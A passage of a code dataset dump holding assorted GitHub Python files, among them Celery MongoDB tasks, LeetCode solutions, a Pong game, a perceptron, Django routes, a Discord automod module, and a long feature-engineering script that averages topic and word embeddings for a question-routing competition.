data\n\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='User:Get Conversation by session id')\ndef GetChatBySessionId(self,id):\n database,client = connection()\n try:\n filter = {'sessionID':id}\n filter_2 = {\"_id\": 0}\n data=database[\"conversations\"].find(filter,filter_2)\n data = json_util.dumps(data)\n client.close()\n except Exception as e:\n print(\"Exception here :\",e)\n return data\n\n\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='user:Update Message In A Conversation.')\ndef updateUser(self,data):\n database,client = connection()\n filter = { \"_id\": ObjectId(data[\"id\"]) }\n del data[\"id\"]\n newvalues = { \"$set\": data }\n try:\n database[\"conversations\"].update_one(filter,newvalues)\n client.close()\n except Exception as e:\n print(\"Exception here :\",e)\n pass\n\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='user:Delete User Conversation.')\ndef deleteUser(self,data):\n database,client = connection()\n filter = { \"_id\": ObjectId(data[\"id\"]) }\n try:\n database[\"conversations\"].delete_one(filter)\n client.close()\n except Exception as e:\n print(\"Exception here :\",e)\n pass\n\n","repo_name":"gowthamr1999/Mongo_celery_fastapi","sub_path":"MongoDB_Celery/celery_tasks/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"944057354","text":"# class Solution:\n# # 扩展左右序号\n# def expandAroundCenter(self, s, left, right):\n# while left >= 0 and right < len(s) and s[left] == s[right]:\n# left -= 1\n# right += 1\n# return left + 1, right - 1\n#\n# def longestPalindrome(self, s):\n# self.start, self.end = 0, 0\n# for i in range(len(s)):\n# self.left1, self.right1 = self.expandAroundCenter(s, i, i)\n# self.left2, self.right2 = self.expandAroundCenter(s, i, i + 1)\n# if self.right1 - self.left1 > self.end - self.start:\n# self.start, self.end = self.left1, self.right1\n# if self.right2 - self.left2 > self.end - self.start:\n# self.start, self.end = self.left2, self.right2\n# return s[self.start: self.end + 1]\n\nclass Solution:\n def longestPalindrome(self, s):\n stack =[]\n res= 0\n for i in range(len(s)):\n if s[i] in stack:\n stack.append(s[i])\n list_temp = ''.join(stack)\n stack.reverse()\n list_temp1 = ''.join(stack)\n if list_temp1 == list_temp:\n res = max(res, len(stack))\n else:\n stack.reverse()\n else:\n stack.append(s[i])","repo_name":"liufeng112233/data-structure-and-algorithm","sub_path":"leetcode刷题/基础练习篇/5、最长回文子串.py","file_name":"5、最长回文子串.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"43794783571","text":"from __future__ import absolute_import, unicode_literals\n\nimport pytest\n\nfrom virtualenv.activation import BashActivator\nfrom virtualenv.info import IS_WIN\n\n\n@pytest.mark.skipif(IS_WIN, reason=\"Github Actions ships with WSL bash\")\ndef test_bash(raise_on_non_source_class, activation_tester):\n class Bash(raise_on_non_source_class):\n def __init__(self, session):\n super(Bash, self).__init__(\n BashActivator,\n session,\n \"bash\",\n \"activate\",\n \"sh\",\n \"You must source this script: $ source \",\n )\n\n activation_tester(Bash)\n","repo_name":"LGE-OSS/oss-review-toolkit-guide","sub_path":"use/result_files/scan/downloads/PyPI/unknown/virtualenv/20.2.1/virtualenv-20.2.1/tests/unit/activation/test_bash.py","file_name":"test_bash.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"28863917126","text":"import pygame, sys\nfrom settings import *\nfrom sprites import *\n\n\ndef countdown():\n if ball_1.counter == 0:\n ball_1.counter = 3\n ball_1.restart()\n ball_1.crnt_time, ball_1.scored = 0, 0\n return\n\n count_surf = count_font.render(f\"{ball_1.counter}\", True, light_grey)\n count_rect = count_surf.get_rect(center=countdown_pos)\n screen.blit(count_surf, count_rect)\n \n\n# Game Loop\ndef main():\n running = True\n while running: \n # Handle Events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == timer:\n ball_1.counter -= 1\n\n # Render / Draw\n screen.fill(bg_color)\n pygame.draw.aaline(screen, grey3, scr_rect.midtop, scr_rect.midbottom)\n sprites.update()\n sprites.draw(screen)\n \n if ball_1.scored:\n countdown()\n\n\n # Update Display & Limit FPS\n pygame.display.flip()\n clock.tick(FPS)\n\n # Exit Game\n pygame.quit()\n sys.exit(0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Blank0211/pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"38261450953","text":"import csv\r\nimport random\r\n\r\n\r\n# carrega os valores do dataset para serem manipulados\r\ndataset = []\r\n\r\nwith open('data.csv') as _file:\r\n data = csv.reader(_file, delimiter=',')\r\n for line in data:\r\n line = [float(elemento) for elemento in line]\r\n dataset.append(line)\r\n\r\n\r\ndef treino_teste_split(dataset, porcentagem):\r\n \"\"\"\r\n Separa e monta o conjunto principal\r\n em dois para testes e treinos\r\n \"\"\"\r\n percent = porcentagem*len(dataset) // 100\r\n data_treino = random.sample(dataset, percent)\r\n data_teste = [data for data in dataset if data not in data_treino]\r\n \r\n \r\n def montar(dataset):\r\n x, y = [], []\r\n for data in dataset:\r\n x.append(data[1:3])\r\n y.append(data[0])\r\n return x, y\r\n\r\n x_train, y_train = montar(data_treino)\r\n x_test, y_test = montar(data_teste)\r\n return x_train, y_train, x_test, y_test\r\n\r\nx_treino, y_treino, x_teste, y_teste = treino_teste_split(dataset, 80)\r\n\r\n\r\ndef sinal(u):\r\n \"\"\" Retorna a classe baseada no valor de u. \"\"\"\r\n return 1 if u >= 0 else -1\r\n\r\n\r\ndef ajuste(w, x, d, y):\r\n \"\"\" Define a taxa de aprendizagem e ajusta o valor do w. \"\"\"\r\n taxa_aprendiz = 0.001\r\n return w + taxa_aprendiz * (d - y) * x\r\n\r\n\r\ndef perceptron_fit(x, d):\r\n \"\"\" Executa o treinamento da rede \"\"\"\r\n epoca = 0\r\n w = [random.random() for i in range(3)]\r\n print(w)\r\n while True:\r\n erro = False\r\n for i in range(len(x)):\r\n u = sum([w[0]*-1, w[1]*x[i][0], w[2]*x[i][1]])\r\n y = sinal(u)\r\n if y != d[i]:\r\n w[0] = ajuste(w[0], -1, d[i], y)\r\n w[1] = ajuste(w[1], x[i][0], d[i], y)\r\n w[2] = ajuste(w[2], x[i][1], d[i], y)\r\n erro = True\r\n epoca += 1\r\n if erro is False or epoca == 1000:\r\n break\r\n print(epoca)\r\n return w\r\n\r\nw_fit = perceptron_fit(x_treino, y_treino)\r\nprint(w_fit)\r\n\r\n\r\ndef perceptron_predict(x, w_ajustado):\r\n y_predict = [] \r\n for i in range(len(x_teste)):\r\n predict = sum([w_ajustado[0]*-1, w_ajustado[1]*x_teste[i][0], w_ajustado[2]*x_teste[i][1]])\r\n y_predict.append(sinal(predict))\r\n return y_predict\r\n\r\ny_validado = perceptron_predict(x_teste, w_fit)\r\nprint(y_validado)\r\n\r\n\r\ndef acuracia(y_teste, y_validado):\r\n total = 0\r\n for i in range(len(y_teste)):\r\n if y_teste[i] == y_validado[i]:\r\n total += 1\r\n else:\r\n ...\r\n return total / len(y_validado)\r\n \r\naccuracy = acuracia(y_teste, y_validado)\r\nprint(accuracy)\r\n\r\n","repo_name":"misa9999/live-python","sub_path":"live35/neural_padrao.py","file_name":"neural_padrao.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"472193843","text":"from django.conf.urls import url\r\nfrom django.urls import include, path\r\nfrom django.contrib import admin\r\nfrom . import views\r\nfrom rest_framework import routers\r\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token\r\n\r\nrouter = routers.DefaultRouter()\r\nrouter.register(r'users', views.UserViewSet)\r\nrouter.register(r'groups', views.GroupViewSet)\r\nrouter.register(r'register',views.RegisterUserViewSet)\r\nrouter.register(r'country',views.CountryViewSet)\r\nrouter.register(r'state',views.StateViewSet)\r\nrouter.register(r'city',views.CityViewSet)\r\nrouter.register(r'properties',views.PropertyViewSet)\r\nrouter.register(r'propertytype',views.PropertyTypeViewSet)\r\nrouter.register(r'propertystatus',views.PropertyStatusViewSet)\nrouter.register(r'propertypurpose',views.PropertyPurposeViewSet)\nrouter.register(r'userprofile',views.UserProfileViewSet)\r\nurlpatterns = [\r\n url(r'^admin/', admin.site.urls),\r\n path('',views.index,name='index'),\r\n path('', include(router.urls)),\r\n path(r'api-token-auth/', obtain_jwt_token),\r\n path(r'api-token-refresh/', refresh_jwt_token),\r\n path(r'current_user/',views.current_user),\r\n path(r'set_user_status/',views.set_user_status),\r\n path(r'recommend/',views.recommend),\n path(r'predictSalePrice/',views.predictSalePrice),\n path(r'chartdata/',views.chartdata),\n path(r'countdata/', views.countdata),\n path(r'property/',views.PropertyFilterViewSet.as_view()),\n path(r'propertyforuser/',views.PropertyBasedOnUserViewSet.as_view()),\n #path(r'properties/', views.PropertyViewSet.as_view()),\n path(r'properties//', views.PropertyDataViewSet.as_view())\n #path(r'userprofile/',views.UserProfileViewSet.as_view()),\n #predictSalePrice\r\n]\r\n\r\n","repo_name":"Goldenstriker/SREPBackend","sub_path":"dataproviderapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"41466042497","text":"from typing import Optional\n\n\nclass Solution:\n def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n curr = head\n while curr and curr.next:\n try:\n if curr.visited:\n return curr\n except AttributeError:\n curr.visited = True\n curr = curr.next\n return None\n","repo_name":"FallingStar624/GSDS3_Algo","sub_path":"FallingStar/LeetCode_W2/142_Linked_List_Cycle_II.py","file_name":"142_Linked_List_Cycle_II.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"25156400499","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 19 19:15:07 2016\n\n@author: marialyu\n\"\"\"\n\nimport os\nfrom word2subwords import *\n\n\ndef my_run ():\n imdir = '/home/marialyu/dev/arabic_segmentation/data/'\n outdir = '/home/marialyu/dev/arabic_segmentation/results/'\n idxs = range(1, 7) + range(10, 18) + range(18, 24) + [27, 28]\n # Get image names\n imnames = []\n for f in os.listdir(imdir):\n full_f = os.path.join(imdir, f)\n if os.path.isfile(full_f) and f.startswith('word'):\n idx = int(re.search('\\d+', f).group())\n if idx in idxs:\n imnames.append(f)\n imnames.sort(key=natural_sort_key)\n\n # Divide string in subwords\n for imname in imnames:\n # Read image\n impath = os.path.join(imdir, imname)\n img = cv2.imread(impath)\n # Get contours of each subword\n subword_cnts = string2subwords(img, delete_diacritics=True)\n # Get list of subword images\n if 0:\n subwords = extract_subword_imgs(img.shape, subword_cnts)\n for subword in subwords:\n cv2.imshow('subword', subword)\n cv2.waitKey(150)\n # Draw all on one image\n if 1:\n color_subwords_img = draw_subwords(img.shape, subword_cnts)\n outpath = os.path.join(outdir, 'primary_' + imname)\n cv2.imwrite(outpath, color_subwords_img)\n# cv2.imshow('Subwords segmentation', color_subwords_img)\n# cv2.waitKey(0)\n # Get list of subword images\n if 0:\n vsubwords = draw_subwords_vertically(img.shape, subword_cnts)\n cv2.imshow('vsubwords', vsubwords)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n my_run()","repo_name":"maryribko/arabic_segmentation","sub_path":"py/my_run.py","file_name":"my_run.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"73"} +{"seq_id":"29135391848","text":"#insert file\nfname = input(\"Enter file:\")\n\n#open file\nif len(fname) < 1 : fname = \"mbox-short.txt\"\ndoc = open(fname)\n\n#read file\ndoc2 = doc.read()\n\n#print all content in upper case\nx = doc2.upper()\nprint (x)\n\t\n","repo_name":"tramontina/P4E_book_exercises","sub_path":"Chapter7-Ex1.py","file_name":"Chapter7-Ex1.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23251003405","text":"from __future__ import annotations\n\nimport re\nfrom typing import TYPE_CHECKING, Callable, List, Optional, TypedDict, Union\n\nimport discord\nimport redis.asyncio as aioredis\nfrom discord.ext.commands import BucketType\n\nfrom lightning import AutoModCooldown, LightningBot\nfrom lightning.models import GuildAutoModRulePunishment\n\nif TYPE_CHECKING:\n class AutoModGuildConfig(TypedDict):\n guild_id: int\n default_ignores: List[int]\n warn_threshold: Optional[int]\n warn_punishment: Optional[str]\n rules: List[AutoModRulePayload]\n\n class AutoModRulePunishmentPayload(TypedDict):\n type: str\n duration: Optional[str]\n\n class AutoModRulePayload(TypedDict):\n guild_id: int\n type: str\n count: int\n seconds: int\n ignores: List[int]\n punishment: AutoModRulePunishmentPayload\n\n\nINVITE_REGEX = re.compile(r\"(?:https?://)?discord(?:app)?\\.(?:com/invite|gg)/[a-zA-Z0-9]+/?\")\nURL_REGEX = re.compile(r\"https?:\\/\\/.*?$\")\n\n\ndef invite_check(message: discord.Message):\n match = INVITE_REGEX.findall(message.content)\n return bool(match)\n\n\ndef url_check(message):\n match = URL_REGEX.findall(message.content)\n return bool(match)\n\n\nclass AutomodConfig:\n def __init__(self, bot: LightningBot, config: AutoModGuildConfig) -> None:\n self.guild_id: int = config[\"guild_id\"]\n self.default_ignores: set[int] = set(config.get(\"default_ignores\", []))\n self.warn_threshold = config.get('warn_threshold')\n self.warn_punishment = config.get('warn_punishment')\n\n self.bot = bot\n\n self.message_spam: Optional[SpamConfig] = None\n self.mass_mentions: Optional[SpamConfig] = None\n self.message_content_spam: Optional[SpamConfig] = None\n self.invite_spam: Optional[SpamConfig] = None\n self.url_spam: Optional[SpamConfig] = None\n # \"Basic Features\"\n self.auto_dehoist: bool = False\n self.auto_normalize: bool = False\n\n self.load_rules(config['rules'])\n\n def load_rules(self, rules):\n for rule in rules:\n if rule['type'] == \"mass-mentions\":\n self.mass_mentions = SpamConfig.from_model(rule, BucketType.member, self)\n if rule['type'] == \"message-spam\":\n self.message_spam = SpamConfig.from_model(rule, BucketType.member, self)\n if rule['type'] == \"message-content-spam\":\n self.message_content_spam = SpamConfig.from_model(rule,\n lambda m: (m.author.id, len(m.content)), self)\n if rule['type'] == \"invite-spam\":\n self.invite_spam = SpamConfig.from_model(rule, BucketType.member, self, check=invite_check)\n if rule['type'] == \"url-spam\":\n self.url_spam = SpamConfig.from_model(rule, BucketType.member, self, check=url_check)\n if rule['type'] == \"auto-dehoist\":\n self.auto_dehoist = True\n if rule['type'] == \"auto-normalize\":\n self.auto_normalize = True\n\n def is_ignored(self, message: discord.Message):\n if not self.default_ignores:\n return False\n\n return any(a in self.default_ignores for a in getattr(message.author, '_roles', [])) or message.author.id in self.default_ignores or message.channel.id in self.default_ignores # noqa\n\n\nclass BasicFeature:\n __slots__ = (\"punishment\")\n\n def __init__(self, data) -> None:\n self.punishment = GuildAutoModRulePunishment(data['punishment'])\n\n\nclass SpamConfig:\n __slots__ = (\"cooldown\", \"punishment\", \"check\")\n\n \"\"\"A class to make interacting with a message spam config easier...\"\"\"\n def __init__(self, rate: int, seconds: int, punishment_config: AutoModRulePunishmentPayload,\n bucket_type: Union[BucketType, Callable[[discord.Message], str]], key: str,\n redis_pool: aioredis.Redis, *,\n check: Optional[Callable[[discord.Message], bool]] = None) -> None:\n self.cooldown = AutoModCooldown(key, rate, seconds, redis_pool, bucket_type)\n self.punishment = GuildAutoModRulePunishment(punishment_config)\n\n if check and not callable(check):\n raise TypeError(\"check must be a callable\")\n\n self.check = check\n\n @classmethod\n def from_model(cls, record: AutoModRulePayload, bucket_type: Union[BucketType, Callable[[discord.Message], str]],\n config: AutomodConfig, *, check=None):\n return cls(record['count'], record['seconds'], record[\"punishment\"], bucket_type,\n f\"automod:{record['type']}:{config.guild_id}\", config.bot.redis_pool, check=check)\n\n async def update_bucket(self, message: discord.Message, increment: int = 1) -> bool:\n if self.check and self.check(message) is False:\n return False\n\n ratelimited = await self.cooldown.hit(message, incr_amount=increment)\n\n return bool(ratelimited)\n\n async def reset_bucket(self, message: discord.Message) -> None:\n # I wouldn't think there's a need for this but if you're using warn (for example), it'll double warn\n await self.cooldown.redis.delete(self.cooldown._key_maker(message))\n","repo_name":"lightning-bot/Lightning","sub_path":"lightning/cogs/automod/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"73"} +{"seq_id":"33600054793","text":"import math\ndef solution(answers):\n answer = []\n a1 = a2 = a3 = 0\n l1 = [1, 2, 3, 4, 5] * math.ceil(len(answers) / 5)\n l2 = [2, 1, 2, 3, 2, 4, 2, 5] * math.ceil(len(answers) / 8)\n l3 = [3, 3, 1, 1, 2, 2, 4, 4, 5, 5] * math.ceil(len(answers) / 10)\n for i in range(len(answers)):\n if answers[i] == l1[i]:\n a1 += 1\n if answers[i] == l2[i]:\n a2 += 1\n if answers[i] == l3[i]:\n a3 += 1\n \n if max(a1, a2, a3) == a1:\n answer.append(1)\n if max(a1, a2, a3) == a2:\n answer.append(2)\n if max(a1, a2, a3) == a3:\n answer.append(3)\n return answer","repo_name":"hhh-one/PythonAlgorithm","sub_path":"Programmers/Level 1/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8604991813","text":"import math\r\nfor _ in range(int(input())):\r\n n, k = [int(x) for x in input().split()]\r\n l = [int(x) for x in input().split()]\r\n l.sort(reverse=True)\r\n move = math.ceil(n/2)\r\n move = n - move + 1\r\n ans = []\r\n for i in range(move-1, len(l), move):\r\n #print(i, l[i])\r\n ans.append(l[i])\r\n ans.sort(reverse=True)\r\n print(sum(ans[0:k]))\r\n","repo_name":"FazleRabbbiferdaus172/Codeforces_Atcoder_Lightoj_Spoj","sub_path":"Sum of Medians.py","file_name":"Sum of Medians.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"24657268228","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: huangqiao\n@file: expert-last\n@time: 2019/12/16 16:02\n\"\"\"\n# %%\n# 特征分析\nimport warnings\n\nwarnings.filterwarnings('ignore')\nimport pandas as pd\nimport numpy as np\nimport gc\nimport pickle\n\n# -------------------------------------------------------train---------------------------#\nwith open('pkl/train.pkl', 'rb') as file:\n invite_info = pickle.load(file)\ninvite_info.head()\n# -------------------------------------------------------test---------------------------#\nwith open('pkl/test.pkl', 'rb') as file:\n test = pickle.load(file)\ntest.head()\n# -------------------------------------------------------single_word---------------------------#\nwith open('pkl/single_word.pkl', 'rb') as file:\n single_word = pickle.load(file)\nsingle_word.head()\n# -------------------------------------------------------word---------------------------#\nwith open('pkl/word.pkl', 'rb') as file:\n word = pickle.load(file)\nword.head()\n# -------------------------------------------------------topic---------------------------#\nwith open('pkl/topic.pkl', 'rb') as file:\n topic = pickle.load(file)\ntopic.head()\n# -------------------------------------------------------member_info---------------------------#\n\nwith open('pkl/user.pkl', 'rb') as file:\n member_info = pickle.load(file)\nmember_info.head()\n# -------------------------------------------------------question_info---------------------------#\n\nwith open('pkl/question_info.pkl', 'rb') as file:\n question_info = pickle.load(file)\nquestion_info.head()\n# -------------------------------------------------------answer_info---------------------------#\n\nwith open('pkl/answer_info.pkl', 'rb') as file:\n answer_info = pickle.load(file)\nanswer_info.head()\n# -------------------------------------------------------member_info---------------------------#\n\nwith open('pkl/user_feat.pkl', 'rb') as file:\n user_feat = pickle.load(file)\nuser_feat.head()\n# %%\n# 特征工程\nimport warnings\n\nwarnings.filterwarnings('ignore')\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport gc\nimport os\nimport time\nimport multiprocessing as mp\nimport logging\nfrom sklearn.preprocessing import LabelEncoder\nfrom tqdm import tqdm, tqdm_notebook, _tqdm_notebook, tqdm_pandas\n\ntic = time.time()\nSAVE_PATH = 'data/feats'\nif not os.path.exists(SAVE_PATH):\n print('create dir: %s' % SAVE_PATH)\n os.mkdir(SAVE_PATH)\n#####################################################################################################################################\n######################################################user###########################################################################\nwith open('pkl/user.pkl', 'rb') as file:\n user = pickle.load(file)\nlogging.info(\"user %s\", user.shape)\n\n\ndef parse_str(d):\n return np.array(list(map(float, d.split())))\n\n\nwith open('pkl/topic.pkl', 'rb') as file:\n topicmap = pickle.load(file)\ntopicmap.shape\ntopic_vector_dict = dict(zip(np.array(topicmap['id']), np.array(topicmap['embed'])))\n\ntype(topic_vector_dict.keys())\n\n\n# 求话题向量平均值\ndef topic2v(x):\n try:\n tmp = topic_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + topic_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return (tmp / len(x))\n\n\nuser.head()\ntqdm.pandas(desc=\"topic2v...\")\nuser['follow_topic_vector'] = user['follow_topic'].progress_apply(lambda x: topic2v(x))\nprint('finished!')\n\n\ndef topic_interest2v(x):\n if len(x) == 0:\n return np.zeros(64)\n else:\n tmp = np.zeros(64)\n for i in x:\n tmp = tmp + topic_vector_dict[i] * x[i]\n return (tmp / len(x))\n\n\ntqdm.pandas(desc=\"topic_interest2v...\")\nuser['inter_topic_vector'] = user['inter_topic'].progress_apply(lambda x: topic_interest2v(x))\nprint('finished!')\nuser.head()\nuser.shape\n\n\ndef listi(x, i):\n return x[i]\n\n\nfor i in range(64):\n col_name = 'topic_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n user[col_name] = user['follow_topic_vector'].apply(lambda x: listi(x, i))\nfor i in range(64):\n col_name = 'topic_interestvector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n user[col_name] = user['inter_topic_vector'].apply(lambda x: listi(x, i))\nuser.head()\nuser.shape\nwith open('pkl/user_feat.pkl', 'wb') as file:\n pickle.dump(user, file)\n#######################################################添加\nPATH = 'data'\n\nuser = pd.read_csv(os.path.join(PATH, 'member_info_0926.txt'),\n names=['uid', 'gender', 'creat_keyword', 'level', 'hot', 'reg_type', 'reg_plat', 'freq', 'uf_b1',\n 'uf_b2',\n 'uf_b3', 'uf_b4', 'uf_b5', 'uf_c1', 'uf_c2', 'uf_c3', 'uf_c4', 'uf_c5', 'score',\n 'follow_topic',\n 'inter_topic'], sep='\\t')\nuser.head()\n\n\ndef parse_list_1(d):\n if d == '-1':\n return [0]\n return list(map(lambda x: int(x[1:]), str(d).split(',')))\n\n\nuser['creat_keyword'] = user['creat_keyword'].apply(parse_list_1)\nuser.head()\nwith open('pkl/word.pkl', 'rb') as file:\n word = pickle.load(file)\nword.shape\nword_vector_dict = dict(zip(np.array(word['id']), np.array(word['embed'])))\n\n\ndef w2v(x):\n try:\n tmp = word_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + word_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return (tmp / len(x))\n\n\ntqdm.pandas(desc=\"w2v...\")\nuser['keyword_vector'] = user['creat_keyword'].progress_apply(lambda x: w2v(x))\nuser.head()\n\n\ndef listi(x, i):\n return x[i]\n\n\nfor i in range(64):\n col_name = 'keyword_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"w2v...\")\n user[col_name] = user['keyword_vector'].apply(lambda x: listi(x, i))\nuser.shape\ncolumns = ['uid']\nfor i in range(64):\n columns.append('keyword_vector_{}'.format(i))\nkeyword_vector = user[columns]\nkeyword_vector.head()\nwith open('pkl/user_keyword_feat.pkl', 'wb') as file:\n pickle.dump(keyword_vector, file)\n######################################################################################################################################\n###############################################question############################################################################\n###################################################################加上topic的64维\nwith open('pkl/question_info.pkl', 'rb') as file:\n ques = pickle.load(file)\nques.shape\nques.head()\ntqdm.pandas(desc=\"topic2v...\")\nques['topic_vector'] = ques['topic'].progress_apply(lambda x: topic2v(x))\nprint('finished!')\n\n\ndef listi(x, i):\n return x[i]\n\n\nfor i in range(64):\n col_name = 'questopic_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n ques[col_name] = ques['topic_vector'].apply(lambda x: listi(x, i))\nques.head()\nques.shape\nwith open('pkl/ques_feat.pkl', 'wb') as file:\n pickle.dump(ques, file)\n##############################################加上title_word切词的64维 title_t2\nwith open('pkl/ques_feat.pkl', 'rb') as file:\n ques = pickle.load(file)\nques.head()\nques.shape\nwith open('pkl/word.pkl', 'rb') as file:\n word = pickle.load(file)\nword.shape\nword_vector_dict = dict(zip(np.array(word['id']), np.array(word['embed'])))\n\n\ndef w2v(x):\n try:\n tmp = word_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + word_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return (tmp / len(x))\n\n\ntqdm.pandas(desc=\"w2v...\")\nques['title_w_vector'] = ques['title_t2'].progress_apply(lambda x: w2v(x))\nques.head()\n\n\ndef parse_str(d):\n return np.array(list(map(float, d.split())))\n\n\ndef listi(x, i):\n return x[i]\n\n\nfrom tqdm import tqdm, tqdm_notebook, _tqdm_notebook, tqdm_pandas\n\nfor i in range(64):\n col_name = 'title_w_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n ques[col_name] = ques['title_w_vector'].apply(lambda x: listi(x, i))\nques.head()\n###################################################################加上内容切词 desc_t2的64维\ntqdm.pandas(desc=\"w2v...\")\nques['desc_w_vector'] = ques['desc_t2'].progress_apply(lambda x: w2v(x))\nfor i in range(64):\n col_name = 'desc_w_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n ques[col_name] = ques['desc_w_vector'].apply(lambda x: listi(x, i))\nques.head()\nwith open('pkl/ques_feat.pkl', 'wb') as file:\n pickle.dump(ques, file)\n############################################################加上内容单字切词desc_t1的64维\nwith open('pkl/ques_feat.pkl', 'rb') as file:\n ques = pickle.load(file)\nques.head()\nwith open('pkl/single_word.pkl', 'rb') as file:\n single_word = pickle.load(file)\nsingle_word.shape\nsingle_word_vector_dict = dict(zip(np.array(single_word['id']), np.array(single_word['embed'])))\n\n\ndef sw2v(x):\n try:\n tmp = single_word_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + single_word_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return (tmp / len(x))\n\n\ntqdm.pandas(desc=\"sw2v...\")\nques['desc_sw_vector'] = ques['desc_t1'].progress_apply(lambda x: sw2v(x))\nques.head()\n\n\ndef parse_str(d):\n return np.array(list(map(float, d.split())))\n\n\ndef listi(x, i):\n return x[i]\n\n\nfrom tqdm import tqdm, tqdm_notebook, _tqdm_notebook, tqdm_pandas\n\nfor i in range(64):\n col_name = 'desc_sw_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"sw2v...\")\n ques[col_name] = ques['desc_sw_vector'].apply(lambda x: listi(x, i))\nques.shape\n############################################################加上内容单字切词desc_t1的64维\ntqdm.pandas(desc=\"sw2v...\")\nques['title_sw_vector'] = ques['title_t1'].progress_apply(lambda x: sw2v(x))\nfor i in range(64):\n col_name = 'title_sw_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"sw2v...\")\n ques[col_name] = ques['title_sw_vector'].apply(lambda x: listi(x, i))\nques.shape\nwith open('pkl/ques_feat.pkl', 'wb') as file:\n pickle.dump(ques, file)\n######################################################################################################################################\n###############################################user_question_similary############################################################################\nwith open('pkl/ques_feat.pkl', 'rb') as file:\n ques = pickle.load(file)\nques.shape\n\ncolumns = ['qid']\n\ncolumns.append('topic_vector')\nques_topic = ques[columns]\nques_topic.head()\nwith open('pkl/user_feat.pkl', 'rb') as file:\n user = pickle.load(file)\nuser.shape\ncolumns = ['uid']\n\ncolumns.append('inter_topic_vector')\nuser_topic = user[columns]\nuser_topic.head()\nuqid_sim = pd.merge(ques_topic, user_topic, on='qid')\nuqid_sim.head(100)\n#################################################################################################################################\n#################################################merge(ans,ques)的topic#####################################################################\n# 加载问题\nwith open('pkl/question_info.pkl', 'rb') as file:\n ques = pickle.load(file)\n\ncolumns = ['qid']\ncolumns.append('topic')\nques_topic = ques[columns]\nques_topic.head()\n# 加载回答\nwith open('pkl/answer_info.pkl', 'rb') as file:\n ans = pickle.load(file)\n\ncolumns = ['qid']\ncolumns.append('uid')\nans_topic = ans[columns]\nans_topic.head()\n# 将回答和问题信息按照qid进行合并\nans_topic_vector = pd.merge(ans_topic, ques_topic, on='qid')\ndel ques\n\n# ans对于文本信息只留了topic\nans_topic_vector.head()\nprint(ans_topic_vector.shape)\n\n\ndef parse_str(d):\n return np.array(list(map(float, d.split())))\n\n\nwith open('pkl/topic.pkl', 'rb') as file:\n topicmap = pickle.load(file)\ntopicmap.shape\ntopic_vector_dict = dict(zip(np.array(topicmap['id']), np.array(topicmap['embed'])))\n\ntype(topic_vector_dict.keys())\n\n\n# 求话题向量平均值\ndef topic2v(x):\n try:\n tmp = topic_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + topic_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return (tmp / 